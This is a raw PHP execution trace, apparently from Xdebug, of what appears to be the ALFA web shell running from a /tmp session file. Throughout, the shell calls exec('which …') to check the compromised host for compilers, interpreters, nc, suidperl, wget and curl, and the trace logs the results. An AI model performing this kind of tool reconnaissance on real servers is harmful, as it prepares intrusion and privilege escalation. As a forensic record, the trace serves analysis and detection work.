5	305	0	0.025068	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'lcc'
6	306	0	0.025082	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which lcc'	FALSE	FALSE	???
7	307	0	0.025097	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which lcc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	308	0	0.025122	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	308	1	0.025136	438312
8	308	R			TRUE
8	309	0	0.025149	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which lcc'	''
8	309	1	0.026370	438416
8	309	R			''
8	310	0	0.026394	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	310	1	0.026410	438416
8	310	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	307	1	0.026436	438272
7	307	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	306	1	0.026460	438272
6	306	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	305	1	0.026491	438232
5	305	R			FALSE
5	311	0	0.026505	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'cc'
6	312	0	0.026520	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which cc'	FALSE	FALSE	???
7	313	0	0.026535	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which cc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	314	0	0.026560	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	314	1	0.026573	438312
8	314	R			TRUE
8	315	0	0.026586	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which cc'	''
8	315	1	0.027816	438816
8	315	R			'/usr/bin/cc'
8	316	0	0.027843	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/cc']
8	316	1	0.027860	438776
8	316	R			'/usr/bin/cc'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/cc'
7	313	1	0.027901	438312
7	313	R			'/usr/bin/cc'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/cc'
6	312	1	0.027927	438312
6	312	R			'/usr/bin/cc'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/cc'
5	311	1	0.027954	438232
5	311	R			11
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	317	0	0.028012	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'ld'
6	318	0	0.028032	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which ld'	FALSE	FALSE	???
7	319	0	0.028056	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which ld'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	320	0	0.028091	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	320	1	0.028105	438312
8	320	R			TRUE
8	321	0	0.028119	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which ld'	''
8	321	1	0.029155	438816
8	321	R			'/usr/bin/ld'
8	322	0	0.029181	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/ld']
8	322	1	0.029198	438776
8	322	R			'/usr/bin/ld'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/ld'
7	319	1	0.029226	438312
7	319	R			'/usr/bin/ld'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/ld'
6	318	1	0.029253	438312
6	318	R			'/usr/bin/ld'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/ld'
5	317	1	0.029278	438232
5	317	R			11
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	323	0	0.029304	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'make'
6	324	0	0.029318	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which make'	FALSE	FALSE	???
7	325	0	0.029334	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which make'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	326	0	0.029359	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	326	1	0.029373	438312
8	326	R			TRUE
8	327	0	0.029387	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which make'	''
8	327	1	0.030400	438816
8	327	R			'/usr/bin/make'
8	328	0	0.030425	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/make']
8	328	1	0.030442	438776
8	328	R			'/usr/bin/make'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/make'
7	325	1	0.030470	438312
7	325	R			'/usr/bin/make'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/make'
6	324	1	0.030497	438312
6	324	R			'/usr/bin/make'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/make'
5	323	1	0.030528	438232
5	323	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	329	0	0.030554	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'php'
6	330	0	0.030568	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which php'	FALSE	FALSE	???
7	331	0	0.030585	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which php'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	332	0	0.030610	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	332	1	0.030623	438312
8	332	R			TRUE
8	333	0	0.030636	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which php'	''
8	333	1	0.031667	438816
8	333	R			'/usr/bin/php'
8	334	0	0.031692	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/php']
8	334	1	0.031709	438776
8	334	R			'/usr/bin/php'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/php'
7	331	1	0.031737	438312
7	331	R			'/usr/bin/php'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/php'
6	330	1	0.031764	438312
6	330	R			'/usr/bin/php'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/php'
5	329	1	0.031790	438232
5	329	R			12
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	335	0	0.031815	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'perl'
6	336	0	0.031830	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which perl'	FALSE	FALSE	???
7	337	0	0.031845	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which perl'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	338	0	0.031892	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	338	1	0.031908	438312
8	338	R			TRUE
8	339	0	0.031922	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which perl'	''
8	339	1	0.033215	438816
8	339	R			'/usr/bin/perl'
8	340	0	0.033250	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/perl']
8	340	1	0.033268	438776
8	340	R			'/usr/bin/perl'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/perl'
7	337	1	0.033298	438312
7	337	R			'/usr/bin/perl'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/perl'
6	336	1	0.033325	438312
6	336	R			'/usr/bin/perl'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/perl'
5	335	1	0.033353	438232
5	335	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	341	0	0.033380	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'python'
6	342	0	0.033395	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which python'	FALSE	FALSE	???
7	343	0	0.033411	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which python'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	344	0	0.033437	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	344	1	0.033452	438312
8	344	R			TRUE
8	345	0	0.033465	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which python'	''
8	345	1	0.034765	438416
8	345	R			''
8	346	0	0.034798	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	346	1	0.034815	438416
8	346	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	343	1	0.034843	438272
7	343	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	342	1	0.034869	438272
6	342	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	341	1	0.034894	438232
5	341	R			FALSE
5	347	0	0.034909	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'ruby'
6	348	0	0.034937	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which ruby'	FALSE	FALSE	???
7	349	0	0.034953	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which ruby'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	350	0	0.034980	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	350	1	0.034995	438312
8	350	R			TRUE
8	351	0	0.035008	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which ruby'	''
8	351	1	0.036359	438416
8	351	R			''
8	352	0	0.036387	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	352	1	0.036403	438416
8	352	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	349	1	0.036430	438272
7	349	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	348	1	0.036454	438272
6	348	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	347	1	0.036478	438232
5	347	R			FALSE
5	353	0	0.036492	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'tar'
6	354	0	0.036506	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which tar'	FALSE	FALSE	???
7	355	0	0.036522	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which tar'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	356	0	0.036547	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	356	1	0.036561	438312
8	356	R			TRUE
8	357	0	0.036574	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which tar'	''
8	357	1	0.037830	438816
8	357	R			'/usr/bin/tar'
8	358	0	0.037856	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/tar']
8	358	1	0.037873	438776
8	358	R			'/usr/bin/tar'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/tar'
7	355	1	0.037901	438312
7	355	R			'/usr/bin/tar'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/tar'
6	354	1	0.037928	438312
6	354	R			'/usr/bin/tar'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/tar'
5	353	1	0.037955	438232
5	353	R			12
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	359	0	0.037981	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'gzip'
6	360	0	0.037996	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which gzip'	FALSE	FALSE	???
7	361	0	0.038011	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which gzip'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	362	0	0.038037	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	362	1	0.038051	438312
8	362	R			TRUE
8	363	0	0.038064	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which gzip'	''
8	363	1	0.039321	438816
8	363	R			'/usr/bin/gzip'
8	364	0	0.039346	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/gzip']
8	364	1	0.039364	438776
8	364	R			'/usr/bin/gzip'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/gzip'
7	361	1	0.039392	438312
7	361	R			'/usr/bin/gzip'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/gzip'
6	360	1	0.039418	438312
6	360	R			'/usr/bin/gzip'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/gzip'
5	359	1	0.039445	438232
5	359	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	365	0	0.039469	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'bzip'
6	366	0	0.039483	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which bzip'	FALSE	FALSE	???
7	367	0	0.039505	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which bzip'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	368	0	0.039530	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	368	1	0.039544	438312
8	368	R			TRUE
8	369	0	0.039557	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which bzip'	''
8	369	1	0.040749	438416
8	369	R			''
8	370	0	0.040773	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	370	1	0.040788	438416
8	370	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	367	1	0.040814	438272
7	367	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	366	1	0.040838	438272
6	366	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	365	1	0.040862	438232
5	365	R			FALSE
5	371	0	0.040876	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'bzialfa2'
6	372	0	0.040890	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which bzialfa2'	FALSE	FALSE	???
7	373	0	0.040906	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which bzialfa2'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	374	0	0.040932	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	374	1	0.040946	438312
8	374	R			TRUE
8	375	0	0.040959	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which bzialfa2'	''
8	375	1	0.042154	438416
8	375	R			''
8	376	0	0.042177	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	376	1	0.042192	438416
8	376	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	373	1	0.042218	438272
7	373	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	372	1	0.042242	438272
6	372	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	371	1	0.042266	438232
5	371	R			FALSE
5	377	0	0.042280	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'nc'
6	378	0	0.042294	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which nc'	FALSE	FALSE	???
7	379	0	0.042309	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which nc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	380	0	0.042334	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	380	1	0.042348	438312
8	380	R			TRUE
8	381	0	0.042361	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which nc'	''
8	381	1	0.043412	438816
8	381	R			'/usr/bin/nc'
8	382	0	0.043438	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/nc']
8	382	1	0.043455	438776
8	382	R			'/usr/bin/nc'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/nc'
7	379	1	0.043483	438312
7	379	R			'/usr/bin/nc'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/nc'
6	378	1	0.043509	438312
6	378	R			'/usr/bin/nc'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/nc'
5	377	1	0.043535	438232
5	377	R			11
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	383	0	0.043560	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'locate'
6	384	0	0.043575	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which locate'	FALSE	FALSE	???
7	385	0	0.043590	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which locate'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	386	0	0.043616	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	386	1	0.043636	438312
8	386	R			TRUE
8	387	0	0.043650	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which locate'	''
8	387	1	0.044678	438416
8	387	R			''
8	388	0	0.044701	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	388	1	0.044717	438416
8	388	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	385	1	0.044743	438272
7	385	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	384	1	0.044768	438272
6	384	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	383	1	0.044791	438232
5	383	R			FALSE
5	389	0	0.044805	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'suidperl'
6	390	0	0.044819	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which suidperl'	FALSE	FALSE	???
7	391	0	0.044835	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which suidperl'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	392	0	0.044860	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	392	1	0.044874	438312
8	392	R			TRUE
8	393	0	0.044887	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which suidperl'	''
8	393	1	0.045882	438416
8	393	R			''
8	394	0	0.045904	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	394	1	0.045920	438416
8	394	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	391	1	0.045946	438272
7	391	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	390	1	0.045971	438272
6	390	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	389	1	0.045995	438232
5	389	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1162	$x = 0
5	395	0	0.046022	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'wget'
6	396	0	0.046037	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which wget'	FALSE	FALSE	???
7	397	0	0.046052	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which wget'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	398	0	0.046077	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	398	1	0.046091	438312
8	398	R			TRUE
8	399	0	0.046104	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which wget'	''
8	399	1	0.047346	438816
8	399	R			'/usr/bin/wget'
8	400	0	0.047377	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/wget']
8	400	1	0.047395	438776
8	400	R			'/usr/bin/wget'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/wget'
7	397	1	0.047424	438312
7	397	R			'/usr/bin/wget'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/wget'
6	396	1	0.047451	438312
6	396	R			'/usr/bin/wget'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/wget'
5	395	1	0.047477	438232
5	395	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	++$x
5	401	0	0.047504	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'fetch'
6	402	0	0.047518	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which fetch'	FALSE	FALSE	???
7	403	0	0.047534	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which fetch'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	404	0	0.047559	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	404	1	0.047574	438312
8	404	R			TRUE
8	405	0	0.047587	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which fetch'	''
8	405	1	0.048897	438416
8	405	R			''
8	406	0	0.048930	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	406	1	0.048946	438416
8	406	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	403	1	0.048972	438272
7	403	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	402	1	0.048996	438272
6	402	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	401	1	0.049020	438232
5	401	R			FALSE
5	407	0	0.049034	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'lynx'
6	408	0	0.049049	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which lynx'	FALSE	FALSE	???
7	409	0	0.049064	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which lynx'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	410	0	0.049090	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	410	1	0.049104	438312
8	410	R			TRUE
8	411	0	0.049117	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which lynx'	''
8	411	1	0.050303	438416
8	411	R			''
8	412	0	0.050326	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	412	1	0.050341	438416
8	412	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	409	1	0.050367	438272
7	409	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	408	1	0.050392	438272
6	408	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	407	1	0.050415	438232
5	407	R			FALSE
5	413	0	0.050429	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'links'
6	414	0	0.050443	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which links'	FALSE	FALSE	???
7	415	0	0.050459	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which links'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	416	0	0.050484	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	416	1	0.050497	438312
8	416	R			TRUE
8	417	0	0.050511	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which links'	''
8	417	1	0.051734	438416
8	417	R			''
8	418	0	0.051760	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	418	1	0.051775	438416
8	418	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	415	1	0.051824	438272
7	415	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	414	1	0.051861	438272
6	414	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	413	1	0.051885	438232
5	413	R			FALSE
5	419	0	0.051898	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'curl'
6	420	0	0.051913	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which curl'	FALSE	FALSE	???
7	421	0	0.051929	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which curl'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	422	0	0.051954	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	422	1	0.051968	438312
8	422	R			TRUE
8	423	0	0.051981	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which curl'	''
